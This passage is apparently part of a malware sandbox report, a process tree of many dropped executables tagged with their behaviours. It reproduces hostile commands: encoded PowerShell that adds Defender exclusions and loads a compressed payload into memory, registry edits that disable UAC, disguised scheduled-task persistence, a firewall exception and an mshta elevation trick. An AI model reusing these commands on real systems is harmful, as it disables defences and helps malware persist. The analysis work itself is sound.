                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                      PID:336
                                                                                                  • C:\Users\Admin\AppData\Local\Temp\Files\OneDrive.exe
                                                                                                    "C:\Users\Admin\AppData\Local\Temp\Files\OneDrive.exe"
                                                                                                    3⤵
                                                                                                    • Executes dropped EXE
                                                                                                    • Adds Run key to start application
                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                    • Suspicious use of WriteProcessMemory
                                                                                                    PID:2204
                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAXABUAGUAbQBwAFwARgBpAGwAZQBzAFwATwBuAGUARAByAGkAdgBlAC4AZQB4AGUAOwAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAcgBvAGMAZQBzAHMAIABDADoAXABVAHMAZQByAHMAXABBAGQAbQBpAG4AXABBAHAAcABEAGEAdABhAFwATABvAGMAYQBsAFwAVABlAG0AcABcAEYAaQBsAGUAcwBcAE8AbgBlAEQAcgBpAHYAZQAuAGUAeABlADsAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAGQAbwBjAHUAbQBlAG4AdABzAFwATwBuAGUARAByAGkAdgBlAC4AZQB4AGUAOwAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAcgBvAGMAZQBzAHMAIABDADoAXABVAHMAZQByAHMAXABBAGQAbQBpAG4AXABkAG8AYwB1AG0AZQBuAHQAcwBcAE8AbgBlAEQAcgBpAHYAZQAuAGUAeABlAA==
                                                                                                      4⤵
                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                      PID:2324
                                                                                                    • C:\Users\Admin\AppData\Local\Temp\wnxddd.exe
                                                                                                      "C:\Users\Admin\AppData\Local\Temp\wnxddd.exe"
                                                                                                      4⤵
                                                                                                      • Executes dropped EXE
                                                                                                      • Adds Run key to start application
                                                                                                      • Suspicious behavior: AddClipboardFormatListener
                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                      • Suspicious use of WriteProcessMemory
                                                                                                      PID:2232
                                                                                                      • C:\Windows\System32\schtasks.exe
                                                                                                        "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "OneDrive" /tr "C:\Users\Admin\AppData\Roaming\OneDrive.exe"
                                                                                                        5⤵
                                                                                                        • Scheduled Task/Job: Scheduled Task
                                                                                                        PID:356
                                                                                                    • C:\Users\Admin\AppData\Local\Temp\xrmcsj.exe
                                                                                                      "C:\Users\Admin\AppData\Local\Temp\xrmcsj.exe"
                                                                                                      4⤵
                                                                                                      • Executes dropped EXE
                                                                                                      • Modifies registry class
                                                                                                      • Suspicious use of WriteProcessMemory
                                                                                                      PID:4948
                                                                                                      • C:\Windows\System32\WScript.exe
                                                                                                        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Updater.vbs"
                                                                                                        5⤵
                                                                                                        • Modifies registry class
                                                                                                        • Suspicious use of WriteProcessMemory
                                                                                                        PID:4828
                                                                                                        • C:\Users\Admin\AppData\Local\Temp\Updater.vbs.exe
                                                                                                          "C:\Users\Admin\AppData\Local\Temp\Updater.vbs.exe" -enc JABLAHgAcAByAGsAdABqAG8AbwAgAD0AIABbAFMAeQBzAHQAZQBtAC4ARABpAGEAZwBuAG8AcwB0AGkAYwBzAC4AUAByAG8AYwBlAHMAcwBdADoAOgBHAGUAdABDAHUAcgByAGUAbgB0AFAAcgBvAGMAZQBzAHMAKAApAC4ATQBhAGkAbgBNAG8AZAB1AGwAZQAuAEYAaQBsAGUATgBhAG0AZQAuAFIAZQBwAGwAYQBjAGUAKAAnAC4AZQB4AGUAJwAsACcAJwApADsAJABOAHkAdgBoAHkAeAB2AGsAaQAgAD0AIABnAGUAdAAtAGMAbwBuAHQAZQBuAHQAIAAkAEsAeABwAHIAawB0AGoAbwBvACAAfAAgAFMAZQBsAGUAYwB0AC0ATwBiAGoAZQBjAHQAIAAtAEwAYQBzAHQAIAAxADsAIAAkAEwAZQBwAGsAbAAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABOAHkAdgBoAHkAeAB2AGsAaQAuAFIAZQBwAGwAYQBjAGUAKAAnAFIARQBNACAAJwAsACAAJwAnACkALgBSAGUAcABsAGEAYwBlACgAJwBAACcALAAgACcAQQAnACkAKQA7ACQARABmAGEAdwBuAG8AIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ASQBPAC4ATQBlAG0AbwByAHkAUwB0AHIAZQBhAG0AKAAgACwAIAAkAEwAZQBwAGsAbAAgACkAOwAkAEMAYwB5AGMAaQAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBNAGUAbQBvAHIAeQBTAHQAcgBlAGEAbQA7ACQATgBsAGEAcwB6AGEAcQBoAGQAcQAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBHAHoAaQBwAFMAdAByAGUAYQBtACAAJABEAGYAYQB3AG4AbwAsACAAKABbAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgBNAG8AZABlAF0AOgA6AEQAZQBjAG8AbQBwAHIAZQBzAHMAKQA7ACQATgBsAGEAcwB6AGEAcQBoAGQAcQAuAEMAbwBwAHkAVABvACgAIAAkAEMAYwB5AGMAaQAgACkAOwAkAE4AbABhAHMAegBhAHEAaABkAHEALgBDAGwAbwBzAGUAKAApADsAJABEAGYAYQB3AG4AbwAuAEMAbABvAHMAZQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AIAAkAEwAZQBwAGsAbAAgAD0AIAAkAEMAYwB5AGMAaQAuAFQAbwBBAHIAcgBhAHkAKAApADsAWwBBAHIAcgBhAHkAXQA6ADoAUgBlAHYAZQByAHMAZQAoACQATABlAHAAawBsACkAOwAgACQARABqAGkAaABjAGMAaABtAHoAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEEAcABwAEQAbwBtAGEAaQBuAF0AOgA6AEMAdQByAHIAZQBuAHQARABvAG0AYQBpAG4ALgBMAG8AYQBkACgAJABMAGUAcABrAGwAKQA7ACAAJABKAG4AegBhAHgAagAgAD0AIAAkAEQAagBpAGgAYwBjAGgAbQB6AC4ARQBuAHQAcgB5AFAAbwBpAG4AdAA7ACAAWwBTAHkAcwB0AGUAbQAuAEQAZQBsAGUAZwBhAHQAZQBdADoAOgBDAHIAZQBhAHQAZQBEAGUAbABlAGcAYQB0AGUAKABbAEEAYwB0AGkAbwBuAF0ALAAgACQASgBuAHoAYQB4AGoALgBEAGUAYwBsAGEAcgBpAG4AZwBUAHkAcABlACwAIAAkAEoAbgB6AGEAeABqAC4ATgBhAG0AZQApAC4ARAB5AG4AYQBtAGkAYwBJAG4AdgBvAGsAZQAoACkAIAB8ACAATwB1AHQALQBOAHUAbABsAA==
                                                                                                          6⤵
                                                                                                          • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                                                                          • Executes dropped EXE
                                                                                                          • Suspicious use of SetThreadContext
                                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                          PID:1108
                                                                                                      • C:\Users\Admin\AppData\Local\Temp\OneDrive.exe
                                                                                                        "C:\Users\Admin\AppData\Local\Temp\OneDrive.exe"
                                                                                                        5⤵
                                                                                                        • Executes dropped EXE
                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                        PID:3140
                                                                                                  • C:\Users\Admin\AppData\Local\Temp\Files\c3.exe
                                                                                                    "C:\Users\Admin\AppData\Local\Temp\Files\c3.exe"
                                                                                                    3⤵
                                                                                                    • Executes dropped EXE
                                                                                                    PID:2808
                                                                                                  • C:\Users\Admin\AppData\Local\Temp\Files\Bluescreen.exe
                                                                                                    "C:\Users\Admin\AppData\Local\Temp\Files\Bluescreen.exe"
                                                                                                    3⤵
                                                                                                    • Executes dropped EXE
                                                                                                    PID:4624
                                                                                                  • C:\Users\Admin\AppData\Local\Temp\Files\tdrpl.exe
                                                                                                    "C:\Users\Admin\AppData\Local\Temp\Files\tdrpl.exe"
                                                                                                    3⤵
                                                                                                    • Executes dropped EXE
                                                                                                    • Adds Run key to start application
                                                                                                    • Drops file in Windows directory
                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                    • Suspicious use of WriteProcessMemory
                                                                                                    PID:3076
                                                                                                    • C:\Windows\sysnldcvmr.exe
                                                                                                      C:\Windows\sysnldcvmr.exe
                                                                                                      4⤵
                                                                                                      • Executes dropped EXE
                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                      • Suspicious use of WriteProcessMemory
                                                                                                      PID:3160
                                                                                                      • C:\Users\Admin\AppData\Local\Temp\1109125257.exe
                                                                                                        C:\Users\Admin\AppData\Local\Temp\1109125257.exe
                                                                                                        5⤵
                                                                                                        • Executes dropped EXE
                                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                        • Suspicious use of WriteProcessMemory
                                                                                                        PID:1708
                                                                                                        • C:\Windows\System32\cmd.exe
                                                                                                          "C:\Windows\System32\cmd.exe" /c reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f
                                                                                                          6⤵
                                                                                                          • Suspicious use of WriteProcessMemory
                                                                                                          PID:3404
                                                                                                          • C:\Windows\system32\reg.exe
                                                                                                            reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f
                                                                                                            7⤵
                                                                                                              PID:3764
                                                                                                          • C:\Windows\System32\cmd.exe
                                                                                                            "C:\Windows\System32\cmd.exe" /c schtasks /delete /f /tn "Windows Upgrade Manager"
                                                                                                            6⤵
                                                                                                            • Suspicious use of WriteProcessMemory
                                                                                                            PID:2972
                                                                                                            • C:\Windows\system32\schtasks.exe
                                                                                                              schtasks /delete /f /tn "Windows Upgrade Manager"
                                                                                                              7⤵
                                                                                                                PID:1584
                                                                                                          • C:\Users\Admin\AppData\Local\Temp\2031716674.exe
                                                                                                            C:\Users\Admin\AppData\Local\Temp\2031716674.exe
                                                                                                            5⤵
                                                                                                            • Executes dropped EXE
                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                            PID:908
                                                                                                            • C:\Users\Admin\AppData\Local\Temp\2066210983.exe
                                                                                                              C:\Users\Admin\AppData\Local\Temp\2066210983.exe
                                                                                                              6⤵
                                                                                                              • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                                                                              • Executes dropped EXE
                                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                                              PID:4744
                                                                                                          • C:\Users\Admin\AppData\Local\Temp\182506255.exe
                                                                                                            C:\Users\Admin\AppData\Local\Temp\182506255.exe
                                                                                                            5⤵
                                                                                                            • Executes dropped EXE
                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                            PID:3556
                                                                                                          • C:\Users\Admin\AppData\Local\Temp\786127328.exe
                                                                                                            C:\Users\Admin\AppData\Local\Temp\786127328.exe
                                                                                                            5⤵
                                                                                                            • Executes dropped EXE
                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                            PID:1908
                                                                                                          • C:\Users\Admin\AppData\Local\Temp\3285315584.exe
                                                                                                            C:\Users\Admin\AppData\Local\Temp\3285315584.exe
                                                                                                            5⤵
                                                                                                            • Executes dropped EXE
                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                            PID:1728
                                                                                                            • C:\Users\Admin\AppData\Local\Temp\1172211728.exe
                                                                                                              C:\Users\Admin\AppData\Local\Temp\1172211728.exe
                                                                                                              6⤵
                                                                                                              • Executes dropped EXE
                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                              PID:4968
                                                                                                      • C:\Users\Admin\AppData\Local\Temp\Files\GoodFrag.exe
                                                                                                        "C:\Users\Admin\AppData\Local\Temp\Files\GoodFrag.exe"
                                                                                                        3⤵
                                                                                                        • Executes dropped EXE
                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                        PID:4304
                                                                                                        • C:\Users\Admin\AppData\Roaming\Runtime Broker.exe
                                                                                                          "C:\Users\Admin\AppData\Roaming\Runtime Broker.exe"
                                                                                                          4⤵
                                                                                                          • Drops startup file
                                                                                                          • Executes dropped EXE
                                                                                                          • Adds Run key to start application
                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                                          • Suspicious behavior: GetForegroundWindowSpam
                                                                                                          PID:464
                                                                                                          • C:\Windows\SysWOW64\netsh.exe
                                                                                                            netsh firewall add allowedprogram "C:\Users\Admin\AppData\Roaming\Runtime Broker.exe" "Runtime Broker.exe" ENABLE
                                                                                                            5⤵
                                                                                                            • Modifies Windows Firewall
                                                                                                            • Event Triggered Execution: Netsh Helper DLL
                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                            • System Time Discovery
                                                                                                            PID:1564
                                                                                                      • C:\Users\Admin\AppData\Local\Temp\Files\njSilent.exe
                                                                                                        "C:\Users\Admin\AppData\Local\Temp\Files\njSilent.exe"
                                                                                                        3⤵
                                                                                                        • Executes dropped EXE
                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                        PID:3592
                                                                                                      • C:\Users\Admin\AppData\Local\Temp\Files\kiyan.exe
                                                                                                        "C:\Users\Admin\AppData\Local\Temp\Files\kiyan.exe"
                                                                                                        3⤵
                                                                                                        • Executes dropped EXE
                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                        • Modifies system certificate store
                                                                                                        PID:236
                                                                                                      • C:\Users\Admin\AppData\Local\Temp\Files\svchost.exe
                                                                                                        "C:\Users\Admin\AppData\Local\Temp\Files\svchost.exe"
                                                                                                        3⤵
                                                                                                        • Executes dropped EXE
                                                                                                        • Drops file in Windows directory
                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                        PID:1656
                                                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZQBmACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHoAcQB2ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGgAZwBxACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHQAcAB5ACMAPgA="
                                                                                                          4⤵
                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                          PID:5096
                                                                                                        • C:\Windows\Client.exe
                                                                                                          "C:\Windows\Client.exe"
                                                                                                          4⤵
                                                                                                          • Executes dropped EXE
                                                                                                          • Drops file in Windows directory
                                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                          PID:3996
                                                                                                          • C:\Windows\System32\cmd.exe
                                                                                                            "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\WIndows\svchost.exe"' & exit
                                                                                                            5⤵
                                                                                                              PID:4604
                                                                                                              • C:\Windows\system32\schtasks.exe
                                                                                                                schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\WIndows\svchost.exe"'
                                                                                                                6⤵
                                                                                                                • Scheduled Task/Job: Scheduled Task
                                                                                                                PID:1884
                                                                                                            • C:\Windows\system32\cmd.exe
                                                                                                              C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp6AA2.tmp.bat""
                                                                                                              5⤵
                                                                                                                PID:4124
                                                                                                                • C:\Windows\system32\timeout.exe
                                                                                                                  timeout 3
                                                                                                                  6⤵
                                                                                                                  • Delays execution with timeout.exe
                                                                                                                  PID:4968
                                                                                                                • C:\WIndows\svchost.exe
                                                                                                                  "C:\WIndows\svchost.exe"
                                                                                                                  6⤵
                                                                                                                  • Executes dropped EXE
                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                  PID:3932
                                                                                                          • C:\Users\Admin\AppData\Local\Temp\Files\winbox.exe
                                                                                                            "C:\Users\Admin\AppData\Local\Temp\Files\winbox.exe"
                                                                                                            3⤵
                                                                                                            • Executes dropped EXE
                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                            PID:1680
                                                                                                          • C:\Users\Admin\AppData\Local\Temp\Files\Client_protected.exe
                                                                                                            "C:\Users\Admin\AppData\Local\Temp\Files\Client_protected.exe"
                                                                                                            3⤵
                                                                                                            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                            • Checks BIOS information in registry
                                                                                                            • Executes dropped EXE
                                                                                                            • Checks whether UAC is enabled
                                                                                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                            PID:4760
                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 4760 -s 1376
                                                                                                              4⤵
                                                                                                              • Program crash
                                                                                                              PID:2568
                                                                                                          • C:\Users\Admin\AppData\Local\Temp\Files\x.exe
                                                                                                            "C:\Users\Admin\AppData\Local\Temp\Files\x.exe"
                                                                                                            3⤵
                                                                                                            • Executes dropped EXE
                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                            PID:4848
                                                                                                          • C:\Users\Admin\AppData\Local\Temp\Files\twztl.exe
                                                                                                            "C:\Users\Admin\AppData\Local\Temp\Files\twztl.exe"
                                                                                                            3⤵
                                                                                                            • Executes dropped EXE
                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                            PID:1144
                                                                                                          • C:\Users\Admin\AppData\Local\Temp\Files\cluton.exe
                                                                                                            "C:\Users\Admin\AppData\Local\Temp\Files\cluton.exe"
                                                                                                            3⤵
                                                                                                            • Executes dropped EXE
                                                                                                            • Loads dropped DLL
                                                                                                            • Suspicious use of SetThreadContext
                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                            • Suspicious behavior: MapViewOfSection
                                                                                                            PID:2532
                                                                                                            • C:\Users\Admin\AppData\Local\Temp\Files\cluton.exe
                                                                                                              "C:\Users\Admin\AppData\Local\Temp\Files\cluton.exe"
                                                                                                              4⤵
                                                                                                              • Executes dropped EXE
                                                                                                              • Accesses Microsoft Outlook profiles
                                                                                                              • outlook_office_path
                                                                                                              • outlook_win_path
                                                                                                              PID:2412
                                                                                                          • C:\Users\Admin\AppData\Local\Temp\Files\pornhub_downloader.exe
                                                                                                            "C:\Users\Admin\AppData\Local\Temp\Files\pornhub_downloader.exe"
                                                                                                            3⤵
                                                                                                            • Executes dropped EXE
                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                            PID:1872
                                                                                                            • C:\Windows\system32\cmd.exe
                                                                                                              "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\E953.tmp\E954.tmp\E955.bat C:\Users\Admin\AppData\Local\Temp\Files\pornhub_downloader.exe"
                                                                                                              4⤵
                                                                                                                PID:3420
                                                                                                                • C:\Windows\system32\mshta.exe
                                                                                                                  mshta vbscript:createobject("shell.application").shellexecute("C:\Users\Admin\AppData\Local\Temp\Files\PORNHU~1.EXE","goto :target","","runas",1)(window.close)
                                                                                                                  5⤵
                                                                                                                  • Access Token Manipulation: Create Process with Token
                                                                                                                  PID:3612
                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\Files\PORNHU~1.EXE
                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\Files\PORNHU~1.EXE" goto :target
                                                                                                                    6⤵
                                                                                                                    • Executes dropped EXE
                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                    PID:2160
                                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                                      "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\EC22.tmp\EC23.tmp\EC24.bat C:\Users\Admin\AppData\Local\Temp\Files\PORNHU~1.EXE goto :target"
                                                                                                                      7⤵
                                                                                                                        PID:1044
                                                                                                                        • C:\Windows\system32\reg.exe
                                                                                                                          reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "ConsentPromptBehaviorAdmin" /t reg_dword /d 0 /F
                                                                                                                          8⤵
                                                                                                                          • UAC bypass
                                                                                                                          PID:1060
                                                                                                                        • C:\Windows\system32\reg.exe
                                                                                                                          reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "EnableLUA" /t reg_dword /d 0 /F
                                                                                                                          8⤵
                                                                                                                          • UAC bypass
                                                                                                                          PID:716
                                                                                                                        • C:\Windows\system32\reg.exe
                                                                                                                          reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "PromptOnSecureDesktop" /t reg_dword /d 0 /F
                                                                                                                          8⤵
                                                                                                                          • UAC bypass
                                                                                                                          PID:1164
                                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                                          C:\Windows\system32\cmd.exe /c "reg query HKEY_CLASSES_ROOT\http\shell\open\command"
                                                                                                                          8⤵
                                                                                                                            PID:3200
                                                                                                                            • C:\Windows\system32\reg.exe
                                                                                                                              reg query HKEY_CLASSES_ROOT\http\shell\open\command
                                                                                                                              9⤵
                                                                                                                                PID:5004
                                                                                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.pornhub.com/
                                                                                                                              8⤵
                                                                                                                              • Enumerates system info in registry
                                                                                                                              • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                                                                                                                              PID:1868
                                                                                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x120,0x124,0x128,0xfc,0x12c,0x7fff0f903cb8,0x7fff0f903cc8,0x7fff0f903cd8
                                                                                                                                9⤵
                                                                                                                                  PID:4488
                                                                                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1844,6967958768544053884,2485478293441520761,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1920 /prefetch:2
                                                                                                                                  9⤵
                                                                                                                                    PID:3920
                                                                                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1844,6967958768544053884,2485478293441520761,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2300 /prefetch:3
                                                                                                                                    9⤵
                                                                                                                                      PID:2476
                                                                                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1844,6967958768544053884,2485478293441520761,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2544 /prefetch:8
                                                                                                                                      9⤵
                                                                                                                                        PID:3132
                                                                                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1844,6967958768544053884,2485478293441520761,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3228 /prefetch:1
                                                                                                                                        9⤵
                                                                                                                                          PID:1596
                                                                                                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1844,6967958768544053884,2485478293441520761,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3252 /prefetch:1
                                                                                                                                          9⤵
                                                                                                                                            PID:2864
                                                                                                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1844,6967958768544053884,2485478293441520761,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4996 /prefetch:1
                                                                                                                                            9⤵
                                                                                                                                              PID:1616
                                                                                                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1844,6967958768544053884,2485478293441520761,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3848 /prefetch:8
                                                                                                                                              9⤵
                                                                                                                                                PID:1144
                                                                                                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe
                                                                                                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1844,6967958768544053884,2485478293441520761,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5844 /prefetch:8
                                                                                                                                                9⤵
                                                                                                                                                  PID:2732
                                                                                                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1844,6967958768544053884,2485478293441520761,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4872 /prefetch:1
                                                                                                                                                  9⤵
                                                                                                                                                    PID:1920
                                                                                                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=1844,6967958768544053884,2485478293441520761,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=4964 /prefetch:8
                                                                                                                                                    9⤵
                                                                                                                                                      PID:5404
                                                                                                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1844,6967958768544053884,2485478293441520761,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4792 /prefetch:1
                                                                                                                                                      9⤵
                                                                                                                                                        PID:6212
                                                                                                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
